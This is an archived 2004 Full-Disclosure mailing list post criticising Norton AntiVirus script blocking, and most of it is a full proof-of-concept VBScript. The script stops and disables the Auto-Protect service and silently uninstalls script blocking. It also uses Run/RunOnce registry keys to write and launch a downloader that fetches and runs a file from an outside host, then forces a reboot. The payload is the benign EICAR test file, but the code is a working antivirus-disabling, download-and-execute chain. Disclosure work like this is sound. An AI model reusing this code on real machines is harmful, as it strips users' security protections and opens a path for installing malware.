lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <4189812E.40202@myrealbox.com> Date: Wed, 03 Nov 2004 20:09:02 -0500 From: Daniel Milisic <dmilisic@...ealbox.com> To: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com Subject: Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code) Hi All, I have major issues with the quality of Norton AntiVirus. For some history, see: http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html - Norton AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed) http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html - Norton AntiVirus 2004/2005 Script Blocking Redux Symantec's Response to this issue: (From a week ago) "ScriptBlocking is intended to provide proactive detection against script-based worms and this component of Norton AntiVirus has been effective at doing this since its introduction in 2001" Huh? Below is a 'typical' script-based virus that Norton AntiVirus will allow a user to run, without *any* intervention on NAV's part whatsoever. It's likely that code similar to this is already appended to script-based threats/worms to assist their penetration in the wild. In a nutshell, here's what it does: On Reboot it sets... 1) The NAV Auto-Protect Service to DISABLED 2) A registry key to Uninstall Script Blocking 3) Creates, launches a VBScript file to d/l the EICAR AV 'test' virus 4) Launches the EICAR.COM test pattern a few seconds later ....Then Reboots your computer. The following code was tested under WinXP and a fully LiveUpdated NAV 2005 using a broadband Internet connection. Should be fine for Win2000 and NAV 2004 as well. --------------//// BEGIN DISABLE_NAV.VBS ////----------------- ' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI ----- sServer = "." Set oWMI = GetObject("winmgmts://.") sServiceName = "Norton AntiVirus Auto-Protect Service" sWQL = "Select state from Win32_Service " _ & "Where displayname='" & sServiceName & "'" Set oResults = oWMI.ExecQuery(sWQL) For Each oService In oResults oService.StopService oService.ChangeStartMode("Disabled") Next ' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ;) ---------- const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv") strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" strValueName = "Uninstall Norton Script Blocking" arrStringValues = ("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q") objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues ' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE --------- Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv") strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" strValueName = "Create Code Downloader" arrStringValues = ("cmd /c ECHO Set X=CreateObject("+chr(34)+"Microsoft.XMLHTTP"+chr(34)+"):X.open "+chr(34)+"GET"+chr(34)+",("+chr(34)+"http://www.eicar.org/download/eicar.com"+chr(34)+"),False:X.send:set Y=createobject("+chr(34)+"adodb.stream"+chr(34)+"):Y.type=1:Y.open:Y.write X.responseBody:Y.savetofile("+chr(34)+"eicar.com"+chr(34)+"),2:Y.close > estart.VBS") objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues ' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ---------- Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv") strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" strValueName = "Create Code Launcer" arrStringValues = ("cmd /c ECHO wscript.sleep(10000):Set Z=CreateObject("+chr(34)+"WSCript.Shell"+chr(34)+"):Z.run("+chr(34)+"cmd /k eicar.com"+chr(34)+") > elaunch.vbs") objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues ' -------- LAUNCH EICAR DOWNLOADER ---------- Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv") strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" strValueName = "Execute Code DownLoader" arrStringValues = ("estart.vbs") objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues ' -------- RUN THE 'VIRUS' ---------- Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv") strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" strValueName = "Execute Malicious Code Launcher" arrStringValues = ("elaunch.vbs") objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues ' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ---- Set wmi = GetObject("winmgmts:{(Shutdown)}") set objset = wmi.instancesof("win32_operatingsystem") for each obj in objset set os = obj : exit for next os.win32shutdown 2 + 4 --------------//// END DISABLE_NAV.VBS ////----------------- Best Regards, Daniel Milisic _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists